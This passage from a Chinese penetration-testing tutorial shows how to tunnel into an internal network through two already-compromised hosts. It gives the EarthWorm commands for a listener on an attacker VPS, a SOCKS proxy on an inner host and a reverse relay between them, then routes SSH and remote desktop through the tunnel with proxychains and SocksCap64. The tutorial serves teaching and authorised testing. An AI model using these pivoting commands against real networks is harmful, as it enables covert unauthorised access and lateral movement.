主页 > 网络知识 > 内网渗透测试:隐藏通讯隧道技术(下)(6)

内网渗透测试:隐藏通讯隧道技术(下)(6)

 

内网渗透测试:隐藏通讯隧道技术(下)

该命令将A主机1080端口收到的代理请求转发给B主机(192.168.52.138)的1234端口。

 

现在,我们就可以通过访问A主机的公网IP(192.168.1.7)的1080端口来使用架设在B主机上的socks代理服务了。配置proxychains:

 

内网渗透测试:隐藏通讯隧道技术(下)

 

用ssh连接内网服务器(192.168.52.128):

 

内网渗透测试:隐藏通讯隧道技术(下)

 

连接成功。

(4)二级网络环境(b)

刚才那个适用于目标机器拥有一个外网IP地址的情况下,假设目标机器没有公网IP的情况下,我们该怎么办呢?

 

内网渗透测试:隐藏通讯隧道技术(下)

如上图环境,A主机既没有公网IP,但能访问外网,也不能访问内网资源,但可以访问内网B主机;内网B主机可以访问内网资源,但不能访问外网。假设我们已经获得了A主机和B主机的控制权限。

 

这里,我们不能像前一种情况那样通访问A主机来使用内网B主机上面架设的socks代理服务,可以通过访问vps来访问B主机上面架设的socks服务。

我们先在公网vps上传ew,在公网vps上面添加转接隧道,监听1080端口,并将1080端口收到的代理请求发送给1234端口,执行命令:

ew_for_linux64 -s lcx_listen -l 1080 -e 1234

 

内网渗透测试:隐藏通讯隧道技术(下)

然后将ew上传至内网B(192.168.52.138)主机,并利用ssocksd方式启动999端口的正向socks代理,执行命令:

 

ew_for_Win.exe -s ssocksd -l 999

 

内网渗透测试:隐藏通讯隧道技术(下)

最后,将ew上传到内网A主机上,在A主机(192.168.52.143)上利用lcx_slave方式,将公网vps的1234端口与内网B主机(192.168.52.138)的999端口连接起来,执行命令:

 

ew_for_Win.exe -s lcx_slave -d 39.xxx.xxx.210 -e 1234 -f 192.168.52.138 -g 999

 

内网渗透测试:隐藏通讯隧道技术(下)

此时,就可以设置proxychains等代理工具,通过访问公网vps的1080端口来使用架设在内网B主机上的socks代理服务了。如下设置proxychains:

 

 

内网渗透测试:隐藏通讯隧道技术(下)

访问内网机器(192.168.52.141)的远程桌面:

 

 

内网渗透测试:隐藏通讯隧道技术(下)

访问成功。除了proxychains,我们还可以使用proxifier、sockscap64等代理工具。如下,我们使用sockscap64来访问内网机器。

 

打开,sockscap64,将你想要进行代理的应用程序添加进去(方法很简单,找到可执行文件后拖进去即可),这里我把远程桌面程序添加了进去

 

内网渗透测试:隐藏通讯隧道技术(下)

 

点击上面的“代理”,进去添加一个代理,设置好vps或代理服务器的IP和指定的端口。

 

内网渗透测试:隐藏通讯隧道技术(下)

添加好后点击右下角“保存”。回到主界面,点击那个“闪电”形状的按钮,测试代理服务器能否正常连接

 

 

内网渗透测试:隐藏通讯隧道技术(下)

正常连接后,右击远程桌面程序,选择“在代理隧道中运行选中程序”,就可以访问内网远程机器了

 

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!